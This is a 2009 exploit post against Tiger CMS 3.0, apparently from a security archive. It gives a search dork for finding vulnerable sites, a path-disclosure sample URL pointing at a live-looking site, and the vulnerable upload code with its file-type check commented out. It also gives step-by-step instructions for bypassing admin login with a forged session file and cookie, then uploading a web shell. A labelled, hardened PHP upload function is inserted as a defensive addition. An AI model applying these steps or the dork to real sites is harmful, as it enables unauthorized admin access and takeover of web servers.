Tiger CMS 3.0 Administrative Bypass

Posted Aug 26, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

Tiger CMS versions 3.0 and below suffer from an administrative bypass vulnerability that allows shell access.

tags | exploit, shell, bypass
SHA-256 | 8de5444c56f8861a2ca6b56d04cc050987567d2be3dbbeb2ac0b6ce66a9519da

==========================================
TIGER CMS <= v3.0 Bypass admin / get shell
==========================================



#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com


Product : TIGER CMS
Version : v3.0
Site : http://tigercms.com/
Dork:"Powered by TIGER CMS v3.0"


Path Disclosure

Sample : http://bobruisk.name/admin/engine/modules/uploads/

Usage:


http://site.com/path/admin/engine/modules/[module_name]

Standard modules, which are suitable for this purpose:

uploads
content
links
metatags
news
pass
templates

Arbitrary file upload
It is unclear why, but the whole problem comes down to 2 lines that are commented out by default.

PHP code:

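// The extension is taken from the client-supplied file name.
$type = strtolower(substr($filename, 1 + strrpos($filename, ".")));
// The extension allow-list below is commented out, so any type is accepted.
// (The error message reads "Invalid file format.")
//$types_ok = array("jpg", "bmp", "gif", "png");
//if(!in_array($type, $types_ok)) $Validate->Locate("javascript:window.close();", 0, 1, "Неверный формат файла.");

// The file is copied into ../uploads/ keeping that extension.
$new_name = 'tiger-'.time().'.'.$type;
$a = copy($file, "../uploads/".$new_name);
$path_all = getenv("SERVER_NAME");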

Example:

http://site.com/path/admin/?task=uploads&sub_task=add
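
A hardened counterpart to the upload snippet above, as an added example that is not part of the original advisory or of Tiger CMS: it restores the extension allow-list, checks the file content and replaces the time-based name. The function name `safe_upload_name`, the constant `TYPES_OK` and the `file` form field are assumptions.

```php
<?php
// Added example, not Tiger CMS code; names are hypothetical.
// Assumes PHP 7.1+ with the fileinfo extension.

// Allow-list from the commented-out $types_ok line, mapped to the MIME
// types the file content must actually have.
const TYPES_OK = [
    'jpg' => ['image/jpeg'],
    'bmp' => ['image/bmp', 'image/x-ms-bmp'],
    'gif' => ['image/gif'],
    'png' => ['image/png'],
];

// Returns a safe name to store the upload under, or null to reject it.
// $clientName is the browser-supplied name, $tmpPath the uploaded temp file.
function safe_upload_name(string $clientName, string $tmpPath): ?string
{
    $type = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($type, TYPES_OK)) {
        return null; // extension is not on the allow-list
    }
    // The extension is attacker-controlled, so check the content as well.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, TYPES_OK[$type], true)) {
        return null; // content does not match the claimed type
    }
    // Unpredictable name instead of the guessable 'tiger-'.time().
    return 'tiger-' . bin2hex(random_bytes(16)) . '.' . $type;
}

// In the real handler the result would feed move_uploaded_file(), e.g.
//   move_uploaded_file($_FILES['file']['tmp_name'], '../uploads/' . $name);
// ('file' is an assumed form field name.)

// Constructed sample inputs: a header-only GIF and a PHP script.
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'x';");

foreach ([['photo.gif', $gif], ['shell.php', $php], ['shell.gif', $php]] as [$name, $path]) {
    $stored = safe_upload_name($name, $path);
    echo $name, ' => ', $stored === null ? 'rejected' : 'stored as ' . $stored, "\n";
}
unlink($gif);
unlink($php);
```

Content sniffing does not stop image/script polyglots, so script execution should also be disabled for the uploads directory.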


Admin authentication bypass

Requirements:

A shell on a neighboring site
Write access to /tmp

Vulnerable code:

admin/login/login2.php

PHP code:

$_SESSION['user_id_admin'] = $id_admin;
$Admins->SuccessAuth($login);


For a successful login we need the administrator's login name. I venture to suggest that it is "admin".

The session file looks like this:

Name: sess_0526152ea0fed5dbbfca86639e0f6fa7

Contents:

user_id_admin|s:1:"1";

Save it in /tmp.
Do not forget to set permissions to 777!
Next, forge the cookie in your browser:

PHPSESSID=0526152ea0fed5dbbfca86639e0f6fa7


Go to:

http://site.com/path/admin/

Authentication now succeeds; upload a shell as described above.


ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~ - [ [ : Inj3ct0r : ] ]